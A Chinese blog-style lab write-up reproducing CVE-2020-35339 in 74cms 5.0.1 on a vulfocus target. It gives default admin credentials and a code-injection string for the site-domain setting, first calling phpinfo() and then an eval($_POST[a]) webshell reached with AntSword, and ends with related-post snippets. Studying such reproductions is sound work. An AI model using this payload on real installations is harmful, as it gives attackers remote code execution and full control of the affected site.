骑士cms任意代码执行(CVE-2020-35339)
本文章仅供学习使用,如用作非法用途,概不负责
0x01 漏洞介绍
骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的“平台+插件”体系,打造用户“DIY”个性化功能定制,为众多地方门户、行业人才提供一个专业、稳定、方便的网络招聘管理平台,致力发展成为引领市场风向的优质高效的招聘软件。
影响版本:74CMS 5.0.1
0x02 靶场地址
http://vulfocus.io/#/dashboard?image_id=cd8de842-58fc-4d89-9764-edf9f8e0eb81
名称:vulfocus/74cms_cve_2020_35339:latest
在这里插入图片描述
0x03 复现
- 启动并访问给出的靶场地址
在url后面加上:/index.php?m=Admin 访问后台,账号密码均为:adminadmin
- 进入后台后,点击:系统——网站配置——在网站域名中填写下面数据使页面返回phpinfo
http://127.0.0.1/.',phpinfo(),'/.com
然后保存,保存后刷新当前页面,phpinfo页面便映入眼帘。
此时再进行登录,登录成功后,只会显示更详细的phpinfo界面,没有其他内容,建议不要随便使用。
然后修改一下代码,便可以直接getshell
getshell
原环境不能正常使用,只能重启环境继续下面的操作。
依旧是上面的步骤,不过代码换成:
http://127.0.0.1/.',eval($_POST[a]),'/.com
然后保存,刷新当前页面
然后直接上蚁剑连接
获得flag
0x04 修复建议
哎,升级版本吧
参考(实现原理):https://blog.csdn.net/qq_41252520/article/details/113850389
骑士cms任意代码执行(CVE-2020-35339)相关推荐
- 骑士cms任意代码执行
漏洞描述: 迅易科技 74cms是中国迅易科技公司的一套基于PHP和MySQL的在线招聘系统. 74cms version 5.0.1 存在安全漏洞,该漏洞源于应用管理控制器ConfigControl ...
- vulfocus——骑士cms任意代码执行(CVE-2020-35339)
描述 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统. 后台账号密码均为adminadmin 复现 1.打开web页面 2.找到后台登陆界面 ip:port/i ...
- 记一次海洋cms任意代码执行漏洞拿shell(url一句话)
实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...
- php里pluck,Pluck CMS后台另两处任意代码执行
前言 本来是在cnvd上看到了有人发Pluck CMS的洞,但是没有公开细节,便想着自己挖一下. 但是审完第一个后发现已经有两位同学写出来了 当时自己的思路跟第一个同学一样,第二个同学的思路自己确实没 ...
- 74cms 任意代码执行(CVE-2020-35339)
74cms 任意代码执行(CVE-2020-35339) 0x01 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统.由太原迅易科技有限公司于2009年 ...
- Android Adobe Reader 任意代码执行分析(附POC)
livers · 2014/04/18 14:05 0x00 描述 前几天老外在fd还有exploit-db上,公布了Adobe Reader任意代码执行的漏洞. 漏洞编号: CVE: 2014-05 ...
- HP officejet、PageWide打印机任意代码执行漏洞cve-2017-2741 Tenable发布漏洞检测插件...
打印机无处不在.在企业,在家里,在学校,但你在做网络安全评估的时候是否考虑过他们?你上一次更新打印机固件是什么时候?您是否知道您的打印机有公共漏洞?Tenable安全公司进行了研究,并发布了漏洞检测 ...
- php 168任意代码执行漏洞之php的Complex (curly) syntax
今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php ?only=1 &show ...
- Apple任意代码执行漏洞
报告编号:B6-2021-072701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-27 0x01 漏洞简述 2021年07月27日,360CERT监测发现Apple ...
最新文章
- Nginx research, nginx module development
- P3805 【模板】manacher 算法【马拉车】
- python中的装饰器(以及多个装饰器详细执行过程)
- html 请求体 响应体,Http协议抓包详解
- BZOJ1787 Meet紧急集合
- js中addEventListener第三个参数涉及到的事件捕获与冒泡
- ios 现有项目接入Flutter (问题集中营--少走弯路)
- 笔记本安装PCMCIA并口卡
- 无线通信网络学习笔记-1
- 手机忘记开机密码怎么办?我来教你
- python爬虫爬取链家二手房信息
- [转]英文自我介绍范文
- Linux系统的历史发展演绎
- 汤姆斯的天堂梦(par)
- GitHub上不错的Android开源项目(三)
- 咦,我和名画撞脸了!
- 3个5相乘列乘法算式_6的乘法口诀教学设计范文
- 程序打包后需要设置管理员权限才可运行的解决办法
- Winsock LSP劫持导致无法上网
- 【Android UI】Paint Gradient 渐变渲染 ① ( LinearGradient 线性渐变渲染 | 设置渲染方向 | 设置渲染颜色 | 设置渲染模式 | MIRROR )
热门文章
- 小米路由修改服务器密码,192.168.31.1小米路由器修改WIFI密码
- selenium爬取亚马逊商品评论
- 大学生充实自己生活的方法
- Rust图片类型识别
- eclipse怎么配置oracle数据库,Eclipse连接Oracle数据库介绍
- Maven:A cycle was detected in the build path of project 'xxx'. The cycle consists of projects {xx}
- 操作系统复习题最全(复习看它就够了!!!!!
- 神经网络机器翻译技术及应用(上)
- Ubuntu18.04风扇狂转的解决办法
- 微信小程序学习日记6